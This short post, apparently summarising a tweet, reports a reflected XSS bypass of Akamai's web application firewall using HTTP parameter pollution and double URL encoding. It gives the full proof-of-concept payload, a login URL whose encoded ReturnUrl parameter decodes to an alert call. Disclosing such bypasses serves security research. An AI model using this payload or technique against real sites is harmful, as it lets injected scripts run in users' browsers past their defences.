A bypass for Reflected XSS in Akamai WAF using HTTP Parameter Pollution and Double URL Encode was discovered. The payload used is /login?ReturnUrl=javascript:1&ReturnUrl=%2561%256c%2565%2572%2574%2528%2564%256f%2563%2575%256d%2565%256e%2574%252e%2564%256f%256d%2561%2569%256e%2529. This bypass technique allows an attacker to execute malicious scripts in the context of a user's browser, potentially leading to various attacks.
Original tweet: https://twitter.com/HackingTeam777/status/1853688099986940366